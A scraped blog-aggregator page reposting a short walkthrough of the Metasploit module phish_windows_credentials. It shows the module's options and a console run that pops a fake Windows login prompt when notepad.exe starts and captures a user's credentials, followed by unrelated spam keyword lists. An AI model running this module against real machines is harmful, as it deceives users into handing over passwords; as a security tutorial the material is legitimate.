程序博客网 > 大华ipc onvif协议端口

Windows Gather User Credentials (phishing)

来源:互联网 发布:大华ipc onvif协议端口 编辑:程序博客网 时间:2024/06/05 01:50

Description:
This module is able to perform a phishing attack on the target by
popping up a loginprompt. When the user fills credentials in the
loginprompt, the credentials will be sent to the attacker. The
module is able to monitor for new processes and popup a loginprompt
when a specific process is starting. Tested on Windows 7.

When notepad.exe is opened in target machine, there will be a login manager window. If you provide the right password, notepad window will appear, or it will continue until you hate it.

msf post(phish_windows_credentials) > show options Module options (post/windows/gather/phish_windows_credentials):   Name         Current Setting                                                                Required  Description   ----         ---------------                                                                --------  -----------   DESCRIPTION  {PROCESS_NAME} needs your permissions to start. Please enter user credentials  yes       Message shown in the loginprompt   PROCESS                                                                                     no        Prompt if a specific process is started by the target. (e.g. calc.exe or specify * for all processes)   SESSION                                                                                     yes       The session to run this module on.msf post(phish_windows_credentials) > set SESSION 1SESSION => 1msf post(phish_windows_credentials) > set PROCESS notepad.exePROCESS => notepad.exemsf post(phish_windows_credentials) > run[+] PowerShell is installed.[*] Monitoring new processes.[*] notepad.exe is already running. Waiting on new instances to start[*] notepad.exe is already running. Waiting on new instances to start[*] notepad.exe is already running. Waiting on new instances to start[*] New process detected: 1040 notepad.exe[*] Killing the process and starting the popup script. Waiting on the user to fill in his credentials...[+] #< CLIXML[+] [+] UserName                   Domain                     Password                 --------                   ------                     --------                 nfs                        nfs-001

[1].https://forsec.nl/2015/02/windows-credentials-phishing-using-metasploit/
[2].https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/phish_windows_credentials.rb
[3].https://github.com/rapid7/metasploit-framework/blob/master/data/post/powershell/Invoke-LoginPrompt.ps1

0 0
大华ipc onvif协议端口 大华ipc onvif协议端口
原创粉丝点击
热门IT博客
js点击radiojs点击radio
吃鸡为什么不优化吃鸡为什么不优化
交通银行数据录入员
云计算龙头股票有哪些
ff14人女主角捏脸数据
怎么在电脑上开淘宝店
伦敦玛丽女王大学知乎
net程序员工程师培训
科比两次得分王数据
免费瓷砖软件
如何打开80端口
万网域名证书下载
cs漫画软件
面板数据怎么处理
画设计图的软件
网络社交工具有哪些
英雄联盟登录网络异常
招行看盘软件
python exec
网络打印机怎么添加
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 面酱是什么 番茄酱面 意面酱的做法 面酱怎么做 家常面酱制作方法 面酱的做法民间的 意面酱怎么用 面酱的制作方法 意面酱哪个牌子好 面酱品牌 面酱烧茄子 黄豆面酱 公鸡意面酱 自制意面酱 番茄意面酱 烤鸭面酱 黑椒意面酱的做法 自制面酱 面酱的吃法 炒面酱的做法 鸡蛋炒面酱 烤冷面酱的做法 烤冷面酱怎么做 烤冷面酱做法 面豉酱 怎样用馒头做面酱 哪个牌子的意面酱好吃 面霜作用 科颜氏面霜 面霜怎么用 艾珂薇面霜 男士面霜 婴儿面霜 儿童面霜 朵颜面霜 小黄鸭面霜 资生堂面霜 n4面霜 好用的面霜 大红瓶面霜 启初面霜

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里